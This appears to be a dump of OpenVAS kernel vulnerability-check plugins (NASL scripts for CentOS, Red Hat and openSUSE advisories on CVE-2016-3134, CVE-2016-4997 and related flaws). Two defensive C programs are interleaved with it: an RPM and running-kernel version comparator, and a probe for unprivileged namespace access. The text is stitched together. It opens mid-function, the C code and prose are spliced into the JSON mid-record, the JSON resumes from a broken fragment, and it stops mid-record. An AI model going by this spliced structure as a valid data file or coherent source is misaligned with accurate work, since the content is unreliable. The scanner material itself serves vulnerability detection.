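    snprintf(va, sizeof va, "%.*s", (int)la, a);
    snprintf(vb, sizeof vb, "%.*s", (int)lb, b);
    int c = rpm_vercmp(va, vb);
    if (c)
        return c;
    return rpm_vercmp(da ? da + 1 : "", db ? db + 1 : "");
}

/* Turn the plugins' "name~version~release" spec into "version-release".
 * Returns 0 on a spec without both separators. */
int plugin_spec_to_vr(const char *spec, char *out, size_t outsz)
{
    const char *p = strchr(spec, '~');
    if (!p || !strchr(p + 1, '~'))
        return 0;
    snprintf(out, outsz, "%s", p + 1);
    char *q = strchr(out, '~');
    if (q)
        *q = '-';
    return 1;
}

/* 1 if the installed EVR is older than the plugin's fixed build (the plugin
 * would report the host), 0 if at or above it, -1 on a malformed spec. */
int package_is_vulnerable(const char *installed_vr, const char *plugin_spec)
{
    char fixed[128];
    if (!plugin_spec_to_vr(plugin_spec, fixed, sizeof fixed))
        return -1;
    return rpm_evrcmp(installed_vr, fixed) < 0;
}

/* The package check cannot see what is booted: a host that installed the fixed
 * kernel but never rebooted still runs the vulnerable code. uname -r looks like
 * "3.10.0-327.10.1.el7.x86_64"; drop the architecture and compare the rest. */
int running_kernel_is_older(const char *uname_release, const char *plugin_spec)
{
    static const char *archs[] = { ".x86_64", ".i686", ".aarch64", ".ppc64le", ".s390x" };
    char vr[128], fixed[128];
    if (!plugin_spec_to_vr(plugin_spec, fixed, sizeof fixed))
        return -1;
    snprintf(vr, sizeof vr, "%s", uname_release);
    for (size_t i = 0; i < sizeof archs / sizeof archs[0]; i++) {
        size_t l = strlen(vr), k = strlen(archs[i]);
        if (l > k && strcmp(vr + l - k, archs[i]) == 0) {
            vr[l - k] = '\0';
            break;
        }
    }
    return rpm_evrcmp(vr, fixed) < 0;
}

int main(void)
{
    /* constructed sample values: the RHSA-2016:1847 fixed build and a pre-update host */
    const char *spec = "kernel~3.10.0~327.36.1.el7";
    const char *installed = "3.10.0-327.10.1.el7";
    printf("installed %s vs %s: %s\n", installed, spec,
           package_is_vulnerable(installed, spec) ? "VULNERABLE" : "fixed");
    struct utsname u;
    if (uname(&u) == 0)
        printf("running %s: %s\n", u.release,
               running_kernel_is_older(u.release, spec) ? "older than fix" : "at or above fix");
    return 0;
}
```

Two things the comparison makes concrete: segments are compared as numbers, so `327.36.1` is newer than `327.10.1` even though `"1" < "3"` as text, and a trailing extra segment makes a version newer, which is why the architecture suffix has to be stripped before comparing `uname -r` against the plugin's build string. The second function is the part worth adding to any of these checks: a clean `isrpmvuln()` result on `kernel` only proves the RPM is installed, not that the host stopped running the vulnerable netfilter code.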
"CVE-2016-3134"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-09-20T00:00:00", "id": "OPENVAS:1361412562310882558", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882558", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:1847 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:1847 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882558\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-20 05:41:20 +0200 (Tue, 20 Sep 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:1847 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A security flaw was found in the Linux kernel in the mark_source_chains()\nfunction in 'net/ipv4/netfilter/ip_tables.c'. It is possible for a\nuser-supplied 'ipt_entry' structure to have a large 'next_offset' field.\nThis field is not bounds checked prior to writing to a counter value at the\nsupplied offset. (CVE-2016-3134, Important)\n\n * A flaw was discovered in processing setsockopt for 32 bit processes on 64\nbit systems. This flaw will allow attackers to alter arbitrary kernel\nmemory when unloading a kernel module. 
This action is usually restricted to\nroot-privileged users but can also be leveraged if the kernel is compiled\nwith CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated\nprivileges. (CVE-2016-4997, Important)\n\n * An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n * In some cases, running the ipmitool command caused a kernel panic due to\na race condition in the ipmi message handler. This update fixes the race\ncondition, and the kernel panic no longer occurs in the described scenario.\n(BZ#1353947)\n\n * Previously, running I/O-intensive operations in some cases caused the\nsystem to terminate unexpectedly after a null pointer dereference in the\nkernel. With this update, a set of patches has been applied to the 3w-9xxx\nand 3w-sas drivers that fix this bug. As a result, the system no longer\ncrashes in the described scenario. (BZ#1362040)\n\n * Previously, the Stream Control Transmission Protocol (SCTP) sockets did\nnot inherit the SELinux labels properly. As a consequence, the sockets were\nlabeled with the unlabeled_t SELinux type which caused SCTP connections to\nfail. The underlying source code has been modified, and SCTP connections\nnow work as expected. (BZ#1354302)\n\n * Previously, the bnx2x driver waited for transmission completions when\nrecovering from a parity event, which substantially increased the recovery\ntime. With this update, bnx2x does not wait for transmission completion in\nthe described circumstances. As a result, the recovery of bnx2x after a\nparity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n * With this update, the audit subsystem enables filtering of processes by\nname besides filtering by PID. 
Users can now audit by executable name (with\nthe '-F exe= path-to-executabl ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:1847\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-September/022085.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-09-16T00:00:00", "id": "OPENVAS:1361412562310871661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871661", "type": "openvas", "title": "RedHat Update for kernel RHSA-2016:1847-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:1847-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it 
under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871661\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-16 05:41:00 +0200 (Fri, 16 Sep 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:1847-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel,\n the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A security flaw was found in the Linux kernel in the mark_source_chains()\nfunction in 'net/ipv4/netfilter/ip_tables.c'. 
It is possible for a\nuser-supplied 'ipt_entry' structure to have a large 'next_offset' field.\nThis field is not bounds checked prior to writing to a counter value at the\nsupplied offset. (CVE-2016-3134, Important)\n\n * A flaw was discovered in processing setsockopt for 32 bit processes on 64\nbit systems. This flaw will allow attackers to alter arbitrary kernel\nmemory when unloading a kernel module. This action is usually restricted to\nroot-privileged users but can also be leveraged if the kernel is compiled\nwith CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated\nprivileges. (CVE-2016-4997, Important)\n\n * An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n * In some cases, running the ipmitool command caused a kernel panic due to\na race condition in the ipmi message handler. This update fixes the race\ncondition, and the kernel panic no longer occurs in the described scenario.\n(BZ#1353947)\n\n * Previously, running I/O-intensive operations in some cases caused the\nsystem to terminate unexpectedly after a null pointer dereference in the\nkernel. With this update, a set of patches has been applied to the 3w-9xxx\nand 3w-sas drivers that fix this bug. As a result, the system no longer\ncrashes in the described scenario. (BZ#1362040)\n\n * Previously, the Stream Control Transmission Protocol (SCTP) sockets did\nnot inherit the SELinux labels properly. As a consequence, the sockets were\nlabeled with the unlabeled_t SELinux type which caused SCTP connections to\nfail. The underlying source code has been modified, and SCTP connections\nnow work as expected. 
(BZ#1354302)\n\n * Previously, the bnx2x driver waited for transmission completions when\nrecovering from a parity event, which substantially increased the recovery\ntime. With this update, bnx2x does not wait for transmission completion in\nthe described circumstances. As a result, the recovery of bnx2x after a\nparity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n * With this update, the audit subsystem enables filtering of processes by\nname besides filtering by PID. Users can now audit by executable name (with\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:1847-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-September/msg00022.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~327.36.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4794", "CVE-2016-5829", "CVE-2016-4997", "CVE-2016-4470"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-07-15T00:00:00", "id": "OPENVAS:1361412562310851367", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851367", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:1798-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
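The Red Hat text above states the precondition that turns CVE-2016-4997 and CVE-2016-4998 from root-only bugs into local privilege escalation: with CONFIG_USER_NS and CONFIG_NET_NS an unprivileged user can create a network namespace it owns and thereby hold CAP_NET_ADMIN over it, which is the capability the IPT_SO_SET_REPLACE path checks. The following is an added example, not code from the advisories or the plugins, that probes only that precondition on the host it runs on: it creates a user namespace and a network namespace in a forked child and tries to open a raw socket there. It never calls into netfilter. The result codes, function names and the interpretation in `ns_probe_name()` are this example's own assumptions.

```c
/* Added example, not code from the advisories or plugins above: a probe for the
 * precondition RHSA-2016:1847 names for CVE-2016-4997/4998, namely that an
 * unprivileged user can obtain network capabilities over a network namespace
 * of its own via CONFIG_USER_NS + CONFIG_NET_NS. It only creates the namespaces
 * and opens a raw socket there; it does not touch the netfilter setsockopt
 * path. Names and result codes are this example's own.
 * Build: cc -o nsprobe nsprobe.c ; run as a normal (non-root) user. */
#define _GNU_SOURCE
#include <errno.h>
#include <netinet/in.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

enum ns_probe {
    NS_PROBE_ERROR = -1,
    NS_NO_USERNS   = 0,  /* unshare(CLONE_NEWUSER) refused: user namespaces off or gated */
    NS_NO_NETNS    = 1,  /* user namespace created, but a new network namespace was refused */
    NS_NO_NETCAPS  = 2,  /* both namespaces created, raw socket still refused */
    NS_REACHABLE   = 3   /* caller holds network capabilities over its own netns */
};

/* Runs in a forked child so the caller's own namespaces are left untouched. */
static int probe_in_child(void)
{
    if (unshare(CLONE_NEWUSER) != 0)
        return NS_NO_USERNS;
    /* The creator of a fresh user namespace holds a full capability set in it,
     * and a network namespace created next is owned by that user namespace. */
    if (unshare(CLONE_NEWNET) != 0)
        return NS_NO_NETNS;
    /* A raw socket needs CAP_NET_RAW in the namespace owner; IPT_SO_SET_REPLACE
     * needs CAP_NET_ADMIN from the same capability set. */
    int fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (fd < 0)
        return NS_NO_NETCAPS;
    close(fd);
    return NS_REACHABLE;
}

/* Returns one of enum ns_probe for the invoking user on this kernel. */
int probe_unprivileged_netns(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return NS_PROBE_ERROR;
    if (pid == 0)
        _exit(probe_in_child());
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return NS_PROBE_ERROR;
    return WEXITSTATUS(status);
}

const char *ns_probe_name(int r)
{
    switch (r) {
    case NS_NO_USERNS:  return "user namespaces unavailable to this user";
    case NS_NO_NETNS:   return "user namespace created, network namespace refused";
    case NS_NO_NETCAPS: return "namespaces created, but no network capabilities";
    case NS_REACHABLE:  return "unprivileged user gets net caps in its own netns";
    default:            return "probe failed";
    }
}

int main(void)
{
    int r = probe_unprivileged_netns();
    printf("euid %u: %s (%d)\n", (unsigned)geteuid(), ns_probe_name(r), r);
    if (geteuid() == 0)
        puts("note: run as an unprivileged user; root reaches the netfilter path anyway");
    return 0;
}
```

NS_REACHABLE on an unpatched kernel means the "in-container root access" wording in the CVE entries does not require a container at all; any local user is in scope, which is the case the RHSA rates Important. NS_NO_USERNS is what a kernel with user namespaces compiled out, disabled by boot parameter or limited through the user namespace sysctls reports, and is the mitigation state for hosts that cannot take the kernel update immediately. The probe is a precondition check only; package and running-kernel version remain the authoritative test for whether the netfilter fix itself is present.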
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851367\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-15 05:27:52 +0200 (Fri, 15 Jul 2016)\");\n script_cve_id(\"CVE-2016-4470\", \"CVE-2016-4794\", \"CVE-2016-4997\", \"CVE-2016-5829\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:1798-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.1 was updated to 4.1.27 to receive various security\n and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. 
(bsc#986362)\n\n - CVE-2016-5829: Multiple heap-based buffer overflows in the\n hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux\n kernel allow local users to cause a denial of service or possibly have\n unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2)\n HIDIOCSUSAGES ioctl call (bnc#986572).\n\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bnc#984755).\n\n - CVE-2016-4794: Use-after-free vulnerability in mm/percpu.c in the Linux\n kernel allowed local users to cause a denial of service (BUG)\n or possibly have unspecified other impact via crafted use of the mmap\n and bpf system calls (bnc#980265).\n\n The following non-security bugs were fixed:\n\n - Refresh patches.xen/xen-netback-coalesce: Restore copying of SKBs with\n head exceeding page size (bsc#978469).\n\n - Refresh patches.xen/xen3-patch-2.6.26 (fix PAT initialization).\n\n - Refresh patches.xen/xen3-patch-2.6.39 (fix ia32_compat inheritance).\n\n - Refresh patches.xen/xen3-patch-3.14: Suppress atomic file position\n updates for /proc/xen/xenbus (bsc#970275).\n\n - Refresh patches.xen/xen3-patch-3.16 (drop redundant addition of a\n comment).\n\n - Refresh patches.xen/xen3-patch-4.1.7-8.\n\n - base: make module_create_drivers_dir race-free (bnc#983977).\n\n - ipvs: count pre-established TCP states as active (bsc#970114).\n\n - net: thunderx: Fix TL4 configuration for secondary Qsets (bsc#986530).\n\n - net: thunderx: Fix link status reporting (bsc#986530).\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1798-1\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", 
